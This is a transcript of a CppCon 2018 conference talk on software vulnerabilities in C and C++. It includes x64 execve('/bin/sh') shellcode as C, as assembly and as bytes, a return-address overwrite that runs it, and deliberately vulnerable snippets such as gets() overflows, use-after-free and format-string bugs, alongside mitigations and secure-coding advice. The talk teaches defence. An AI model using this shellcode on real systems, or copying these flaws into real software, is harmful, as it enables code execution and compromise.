SlideShare a Scribd company logo

Software Vulnerabilities in C and C++ (CppCon 2018)

Patricia Aas
Patricia Aas

What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.

Software
1 of 114
Download to read offline
@pati_gallardo T S
Software Vulnerabilities in C and C++ @pati_gallardo Patricia Aas CppCon 2018 T S
Patricia Aas - Consultant T S C++ Programmer, Application Security Currently : T S Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science - main language Java Pronouns: she/her
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Undefined Behaviour @pati_gallardo
undefined behavior “Examples of undefined behavior are memory accesses outside of array bounds, signed integer overflow, null pointer dereference, modification of the same scalar more than once in an expression without sequence points, access to an object through a pointer of a different type, etc. Compilers are not required to diagnose undefined behavior (although many simple situations are diagnosed), and the compiled program is not required to do anything meaningful.” http://en.cppreference.com/w/cpp/language/ub @pati_gallardo 6
- Don’t reason about undefined behaviour - Assume that it crashes or is never executed - Changing compiler, compiler version or optimization level can break your application Undefined Behaviour
Infinite Loop int main(void) { complex<int> delta; complex<int> mc[4] = {0}; for(int di = 0; di < 4; di++, delta = mc[di]) cout << di << endl; } (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug Undefined Behavior: Access out of bounds @pati_gallardo 8
Infinite Loop Want to give it a try? Compiler Explorer https://godbolt.org/g/TDjM8h Wandbox https://wandbox.org/permlink/aAFP2bMjA3um3L4K Github https://github.com/patricia-gallardo/insecure-coding-examples/ blob/master/vulnerable/infinite_loop.cpp @pati_gallardo (Thanks to @shafikyaghmour) https://stackoverflow.com/questions/32506643/c-compilation-bug9
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
What specs exist? @pati_gallardo
CG: C++ Core Guidelines (328 pages!) @pati_gallardo
SEI: CERT C++ Coding Standard (435 pages!) @pati_gallardo
CWE : Common Weakness Enumeration (1572 pages!) @pati_gallardo
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Compiler Optimization @pati_gallardo
@pati_gallardo The Case Of The Disappearing Memset @pati_gallardo
CWE-14: Compiler Removal of Code to Clear Buffers void GetData(char *MFAddr) { char pwd[64]; if (GetPasswordFromUser(pwd, sizeof(pwd))) { if (ConnectToMainframe(MFAddr, pwd)) { // Interaction with mainframe } } memset(pwd, 0, sizeof(pwd)); // <- Removed by the optimizer } SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 18
Want to give it a try? https://godbolt.org/g/FpEsht SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 19 CWE-14: Compiler Removal of Code to Clear Buffers
Memset_s : Zeroing Memory // Compliant Solution (C11) memset_s(pwd, 0, sizeof(pwd)); // Windows Solution SecureZeroMemory(pwd, sizeof(pwd)); SEI: MSC06-C. Beware of compiler optimizations SEI: MEM03-C. Clear sensitive information stored in reusable resources @pati_gallardo 20
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Exploit Development 101 @pati_gallardo
Smashing The Stack For Fun And Profit Aleph One, Phrack Magazine issue 49 @pati_gallardo 23
Stack Overflow Code: github.com/patricia-gallardo/insecure-coding-examples/ (directory: smashing) Thanks to #security on #include Discord, especially Vesim and hthh @pati_gallardo 24
Peptalk @pati_gallardo 25
$
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo 27 Write inline assembly, eliminating zero bytes
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 28
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 29
C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 30
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 31
int main(void) { __asm__( "jmp push_stringnt" "pop_string: pop %rdint" … "push_string: call pop_stringnt" ".string "/bin/sh"nt" ); } @pati_gallardo 32
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall number : 59 (x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] @pati_gallardo 33
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 34
C code for our shellcode #include <unistd.h> int main(void) { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } @pati_gallardo 35
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 36
argv[0] (%rsp) /bin/sh argv[1] 8(%rsp) NULL %rax : syscall number (59 x64) %rdi : const char *filename %rsi : const char *const argv[] %rdx : const char *const envp[] %rdi /bin/sh %rdx 0 (NULL) %rax $0x3b (59, execve syscall #) %rsi %rsp Stack Registers 37
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 38
Shellcode - code that gives you shell int execve( const char *filename, char *const argv[], char *const envp[]); @pati_gallardo Target Process Vulnerable Program Target Process /bin/sh Shellcode 39
$
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 41
$ objdump -d shellcodeasm | grep main -C 20
1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 43
char shellcode[] = "xebx17" // jmp push_string "x5f" // pop_string: pop %rdi "x48x31xd2" // xor %rdx, %rdx "x48x31xc0" // xor %rax, %rax "x48x89xe6" // mov %rsp, %rsi "x48x89x54x24x08" // mov %rdx, 8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // callq pop_string "/bin/sh"; @pati_gallardo 44
Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 45
int main(void) { intptr_t *ret; ret = (intptr_t *) &ret + 2; (*ret) = (intptr_t) shellcode; } The Exploit: How to run your shell code @pati_gallardo 46
Wat? What Happened to our Stack Overflow? @pati_gallardo 47
Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 48
Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49
Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Instruction addresses also go toward higher addresses 50
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Exploitability @pati_gallardo
1. Unsigned Integer Wraparound 2. Signed Integer Overflow 3. Numeric Truncation 4. Stack Buffer Overflow 5. Heap Buffer Overflow 6. Buffer Underflow 7. Use After Free 8. Double Free 9. Incorrect Type Conversion 10. Uncontrolled Format String @pati_gallardo
Code is on GitHub: https://github.com/patricia-gallardo/insecure-coding-examples @pati_gallardo 54
1) Unsigned Integer Wraparound 2) Signed Integer Overflow 3) Numeric Truncation Error @pati_gallardo 55
1) CWE-190: Unsigned Integer Wraparound int main(void) { unsigned int first_len = UINT_MAX; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- sum == 255 memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT30-C. Ensure that unsigned integer operations do not wrap @pati_gallardo 56
2) CWE-190: Signed Integer Overflow int main(void) { int first_len = INT_MAX; int second_len = 256; int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- UB (negative) memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT32-C. Ensure that operations on signed integers do not result in @pati_gallardo 57
3) CWE-197: Numeric Truncation Error int main(void) { unsigned int first_len = UINT_MAX - 256; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; int new_len = (first_len+second_len); // IDB (negative) if(new_len <= 256) { memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT31-C. Ensure that integer conversions do not result in lost or misinterpreted data @pati_gallardo 58
4) Stack-based Buffer Overflow 5) Heap-based Buffer Overflow 6) Buffer Underwrite/Underflow @pati_gallardo 59
4) CWE-121: Stack-based Buffer Overflow int main(void) { char buffer[10]; // CWE-242: Inherently Dangerous Function gets(buffer); // <- Write outside } SEI-STR31-C. Guarantee that storage for str. has sufficient space for character data and the null terminator @pati_gallardo 60
5) CWE-122: Heap-based Buffer Overflow int main(int argc, char * argv[]) { char* buf = (char*)malloc(sizeof(char)*10); strcpy(buf, argv[1]); // <- Write outside free(buf); } SEI-ARR38-C. Guarantee that library functions do not form invalid pointers @pati_gallardo 61
6) CWE-124: Buffer Underwrite / Underflow int main(void) { char src[12]; strcpy(src, "Hello World"); size_t length = strlen(src); int index = (length -1); while (src[index] != ':') { src[index] = '0'; index--; } } SEI-ARR30-C. Do not form or use out-of-bounds pointers or array subscripts @pati_gallardo 62
7) Use After Free 8) Double Free @pati_gallardo 63
7) CWE-416: Use After Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] printf("%lun", strlen(buffer)); //Use after free } SEI-MEM30-C. Do not access freed memory @pati_gallardo 64
8) CWE-415: Double Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] free(buffer); // second free } SEI-MEM51-CPP. Properly deallocate dynamically allocated resources @pati_gallardo 65
9) Incorrect Type Conversion/Cast 10) Use of External Format String @pati_gallardo 66
9) CWE-704: Incorrect Type Conversion/Cast struct A {}; struct B {}; int main(void) { struct A * a = (struct A *) malloc (sizeof (struct A)); struct B * b = (struct B *) a; // cast to unrelated type } SEI-EXP05-CPP. Do not use C-style casts @pati_gallardo 67
10) CWE-134: Use of External Format String int main(int argc, char * argv[]) { char * format = argv[1]; char * str = argv[2]; printf(format, str); } $ ./format_string "%s %d" "Hello World" Hello World 1745066888 SEI-FIO47-C. Use valid format strings @pati_gallardo 68
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
Use Your Tools @pati_gallardo @pati_gallardo
Classes of Tools - Several compilers - Warnings / Errors - Instrumentation - Static Analysis - Automated Tests - Fuzzing - Continuous Integration - Libraries @pati_gallardo 71
Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
The Eight I'd Really Rather You Didn'ts* *The Eight Condiments (Pastafarianism) @pati_gallardo 73
Caution: Don’t take me too seriously. But seriously, think about it! *wink* @pati_gallardo 74
The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 75
1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 76
CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New @pati_gallardo 77
3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 78
@pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input79
5. I'd Really Rather You Didn't: Use Pointers a Lot @pati_gallardo 80
6. I'd Really Rather You Didn't: Write “clever” code @pati_gallardo 81
7. I'd Really Rather You Didn't: Use shared_ptr a Lot @pati_gallardo 82
8. I'd Really Rather You Didn't: Share State a Lot @pati_gallardo 83
T S P f . Patricia Aas, T S @pati_gallardo
@pati_gallardo T S
Expanding on Some of the points
The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 87
1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 88
Std::string - Concatenate Strings int main() { std::string first = "Hello "; std::string second = "World"; std::string buffer = first + second; std::cout << buffer << "n"; } @pati_gallardo 89
Std::cout/cin : Using the Command Line int main(int argc, char * argv[]) { std::string second; std::cin >> second; std::string first = argv[1]; std::string buffer = first + second; std::cout << buffer << "n"; } $ ./command_line "Hello " World Hello World @pati_gallardo 90
Algorithms : Strip after Colon int main() { string str = "Hello:World"; auto colon = [](int ch) { return ch == ':'; }; auto first = find_if(rbegin(str), rend(str), colon); str.erase(first.base(), end(str)); } @pati_gallardo 91
C++ Casts : Safe Downcasting class Spiderman {}; class Ironman {}; int main() { Spiderman * peter = new Spiderman; Ironman * tony = static_cast<Ironman*>(peter); } inheritance.cpp:6:20: error: static_cast from 'Spiderman *' to 'Ironman *', which are not related by inheritance, is not allowed Ironman * tony = static_cast<Ironman*>(peter); ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 error generated. @pati_gallardo 92
CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New93 @pati_gallardo
Allocating on the Stack #include "Hero.h" int main() { Hero h; } @pati_gallardo @pati_gallardo
Where is it? Stack Hero stackHero; Heap unique_ptr<Hero> heapHero = make_unique<Hero>(); Hero * heapHero = new Hero(); @pati_gallardo @pati_gallardo
Loving the Stack #include <iostream> #include <string> using namespace std; int main() { { string s("Hello World!"); cout << s; } // <- GC happens here! } @pati_gallardo @pati_gallardo
Using the Stack To Manage Resource Lifetimes Destroyed when exiting scope Deterministic Garbage Collection @pati_gallardo
Hold a Value on the Stack that Controls The Lifetime of Your Heap Allocated Object using namespace std; { unique_ptr<Hero> myHero = make_unique<Hero>(); shared_ptr<Hero> ourHero = make_shared<Hero>(); } Smart Pointers @pati_gallardo
3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 99
Primitive types have no semantics, only limits Reduce the value space Keep it within defined behavior Enum class, string literals, user defined literals, size_t @pati_gallardo100
Enum Class enum class Direction : char { NORTH = 'N', EAST = 'E', WEST = 'W', SOUTH = 'S' }; std::ostream& operator << (std::ostream& os, const Direction& obj) { os << static_cast<std::underlying_type<Direction>::type>(obj); return os; } int main() { std::cout << "t" << Direction::NORTH << "n" << "t" << Direction::EAST << "n" << "t" << Direction::WEST << "n" << "t" << Direction::SOUTH << "n"; } @pati_gallardo 101
String Literals using namespace std::literals::string_literals; int main() { auto heroes = {"Spiderman"s, "Ironman"s, "Wonder Woman"s}; for(auto const & hero : heroes) { std::cout << "t" << hero << "n"; } } @pati_gallardo 102
1) User Defined Literals int main() { auto h = 24_hours; auto d = 7_days; auto err = h + d; } user_defined_literals.cpp:25:21: error: invalid operands to binary expression ('Hours' and 'Days') auto err = hours + days; ~~~~~ ^ ~~~~ 1 error generated. @pati_gallardo 103
2) User Defined Literals struct Hours { explicit Hours(unsigned long long n) : num(n) {} unsigned long long num = 0; }; struct Days { explicit Days(unsigned long long n) : num(n) {} unsigned long long num = 0; }; @pati_gallardo 104
3) User Defined Literals Hours operator "" _hours(unsigned long long num) { return Hours(num); } Days operator "" _days(unsigned long long num) { return Days(num); } @pati_gallardo 105
Use Size_t for Sizes - Unsigned integer type - Result of the sizeof operator - Use for object sizes - Use for array indexing and loop counting @pati_gallardo 106
@pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input107
Taint - Is the source of this value in your code? - Command line args, size fields in headers, exported functions, APIs @pati_gallardo 108
So… what should I remember from this presentation? @pati_gallardo 109
Well, I'd Really Rather You Didn't: Use C @pati_gallardo 110
Learn some Modern C++ Instead! @pati_gallardo 111
Bjarne Stroustrup “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” @pati_gallardo 112
Bjarne Stroustrup “Within C++, there is a much smaller and cleaner language struggling to get out.” @pati_gallardo 113
@pati_gallardo T S

Recommended

Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
Bootstrap grids
Bootstrap gridsBootstrap grids
Bootstrap gridsWebtech Learning
 
New Elements & Features in CSS3
New Elements & Features in CSS3New Elements & Features in CSS3
New Elements & Features in CSS3Jamshid Hashimi
 
Implementation of c string functions
Implementation of c string functionsImplementation of c string functions
Implementation of c string functionsmohamed sikander
 
Just-In-Time Compiler in PHP 8
Just-In-Time Compiler in PHP 8Just-In-Time Compiler in PHP 8
Just-In-Time Compiler in PHP 8Nikita Popov
 
The solution manual of programming in ansi by Robin
The solution manual of programming in ansi by RobinThe solution manual of programming in ansi by Robin
The solution manual of programming in ansi by RobinShariful Haque Robin
 
Solid C++ by Example
Solid C++ by ExampleSolid C++ by Example
Solid C++ by ExampleOlve Maudal
 

Recommended

Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Secure Programming Practices in C++ (NDC Security 2018)
Secure Programming Practices in C++ (NDC Security 2018)Patricia Aas
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
Bootstrap grids
Bootstrap gridsBootstrap grids
Bootstrap gridsWebtech Learning
 
New Elements & Features in CSS3
New Elements & Features in CSS3New Elements & Features in CSS3
New Elements & Features in CSS3Jamshid Hashimi
 
Implementation of c string functions
Implementation of c string functionsImplementation of c string functions
Implementation of c string functionsmohamed sikander
 
Just-In-Time Compiler in PHP 8
Just-In-Time Compiler in PHP 8Just-In-Time Compiler in PHP 8
Just-In-Time Compiler in PHP 8Nikita Popov
 
The solution manual of programming in ansi by Robin
The solution manual of programming in ansi by RobinThe solution manual of programming in ansi by Robin
The solution manual of programming in ansi by RobinShariful Haque Robin
 
Solid C++ by Example
Solid C++ by ExampleSolid C++ by Example
Solid C++ by ExampleOlve Maudal
 
A quick and fast intro to Kotlin
A quick and fast intro to Kotlin A quick and fast intro to Kotlin
A quick and fast intro to Kotlin XPeppers
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationNational Cheng Kung University
 
Character drivers
Character driversCharacter drivers
Character driverspradeep_tewani
 
Unicode basics in python
Unicode basics in pythonUnicode basics in python
Unicode basics in pythonNavaneethan Ramasamy
 
Telephone billing system in c++
Telephone billing system in c++Telephone billing system in c++
Telephone billing system in c++vikram mahendra
 
Web development using HTML and CSS
Web development using HTML and CSSWeb development using HTML and CSS
Web development using HTML and CSSSiddhantSingh980217
 
Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++Rushil Aggarwal
 
HTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventionsHTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventionsKnoldus Inc.
 
Coding For Kids
Coding For Kids Coding For Kids
Coding For Kids Krupesh Shah
 
Signature verification of kernel module and kexec
Signature verification of kernel module and kexecSignature verification of kernel module and kexec
Signature verification of kernel module and kexecjoeylikernel
 
Getting Information through HTML Forms
Getting Information through HTML FormsGetting Information through HTML Forms
Getting Information through HTML FormsMike Crabb
 
Le Wagon - 2h Landing
Le Wagon - 2h LandingLe Wagon - 2h Landing
Le Wagon - 2h LandingBoris Paillard
 
Epoll - from the kernel side
Epoll - from the kernel sideEpoll - from the kernel side
Epoll - from the kernel sidellj098
 
Tech talk on Tailwind CSS
Tech talk on Tailwind CSSTech talk on Tailwind CSS
Tech talk on Tailwind CSSSquareboat
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming languagerobin_sy
 
Css3
Css3Css3
Css3Deepak Mangal
 
Rust-lang
Rust-langRust-lang
Rust-langAnthony Broad-Crawford
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdfAdrian Huang
 
Le Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing pageLe Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing pageHidehiro Nagaoka
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);Joel Porquet
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
 

More Related Content

What's hot

A quick and fast intro to Kotlin
A quick and fast intro to Kotlin A quick and fast intro to Kotlin
A quick and fast intro to Kotlin XPeppers
 
Telephone billing system in c++
Telephone billing system in c++Telephone billing system in c++
Telephone billing system in c++vikram mahendra
 
Web development using HTML and CSS
Web development using HTML and CSSWeb development using HTML and CSS
Web development using HTML and CSSSiddhantSingh980217
 
Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++Rushil Aggarwal
 
HTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventionsHTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventionsKnoldus Inc.
 
Signature verification of kernel module and kexec
Signature verification of kernel module and kexecSignature verification of kernel module and kexec
Signature verification of kernel module and kexecjoeylikernel
 
Getting Information through HTML Forms
Getting Information through HTML FormsGetting Information through HTML Forms
Getting Information through HTML FormsMike Crabb
 
Epoll - from the kernel side
Epoll - from the kernel sideEpoll - from the kernel side
Epoll - from the kernel sidellj098
 
Tech talk on Tailwind CSS
Tech talk on Tailwind CSSTech talk on Tailwind CSS
Tech talk on Tailwind CSSSquareboat
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming languagerobin_sy
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdfAdrian Huang
 
Le Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing pageLe Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing pageHidehiro Nagaoka
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelAdrian Huang
 

What's hot (20)

A quick and fast intro to Kotlin
A quick and fast intro to Kotlin A quick and fast intro to Kotlin
A quick and fast intro to Kotlin
 
Qemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System EmulationQemu JIT Code Generator and System Emulation
Qemu JIT Code Generator and System Emulation
 
Character drivers
Character driversCharacter drivers
Character drivers
 
Unicode basics in python
Unicode basics in pythonUnicode basics in python
Unicode basics in python
 
Telephone billing system in c++
Telephone billing system in c++Telephone billing system in c++
Telephone billing system in c++
 
Web development using HTML and CSS
Web development using HTML and CSSWeb development using HTML and CSS
Web development using HTML and CSS
 
Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++Computer science Investigatory Project Class 12 C++
Computer science Investigatory Project Class 12 C++
 
HTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventionsHTML5, CSS, JavaScript Style guide and coding conventions
HTML5, CSS, JavaScript Style guide and coding conventions
 
Coding For Kids
Coding For Kids Coding For Kids
Coding For Kids
 
Signature verification of kernel module and kexec
Signature verification of kernel module and kexecSignature verification of kernel module and kexec
Signature verification of kernel module and kexec
 
Getting Information through HTML Forms
Getting Information through HTML FormsGetting Information through HTML Forms
Getting Information through HTML Forms
 
Le Wagon - 2h Landing
Le Wagon - 2h LandingLe Wagon - 2h Landing
Le Wagon - 2h Landing
 
Epoll - from the kernel side
Epoll - from the kernel sideEpoll - from the kernel side
Epoll - from the kernel side
 
Tech talk on Tailwind CSS
Tech talk on Tailwind CSSTech talk on Tailwind CSS
Tech talk on Tailwind CSS
 
Rust system programming language
Rust system programming languageRust system programming language
Rust system programming language
 
Css3
Css3Css3
Css3
 
Rust-lang
Rust-langRust-lang
Rust-lang
 
Physical Memory Management.pdf
Physical Memory Management.pdfPhysical Memory Management.pdf
Physical Memory Management.pdf
 
Le Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing pageLe Wagon Tokyo - 2 hours landing page
Le Wagon Tokyo - 2 hours landing page
 
Memory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux KernelMemory Mapping Implementation (mmap) in Linux Kernel
Memory Mapping Implementation (mmap) in Linux Kernel
 

Similar to Software Vulnerabilities in C and C++ (CppCon 2018)

printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);
printf("%s from %c to Z, in %d minutes!\n", "printf", 'A', 45);Joel Porquet
 
Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Secure Programming Practices in C++ (NDC Oslo 2018)
Secure Programming Practices in C++ (NDC Oslo 2018)Patricia Aas
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
 
C++ The Principles of Most Surprise
C++ The Principles of Most SurpriseC++ The Principles of Most Surprise
C++ The Principles of Most SurprisePatricia Aas
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Much ado about randomness. What is really a random number?
Much ado about randomness. What is really a random number?Aleksandr Yampolskiy
 
Driver Debugging Basics
Driver Debugging BasicsDriver Debugging Basics
Driver Debugging BasicsBala Subra
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects Andrey Karpov
 
Introduction to Assembly Language
Introduction to Assembly LanguageIntroduction to Assembly Language
Introduction to Assembly LanguageMotaz Saad
 
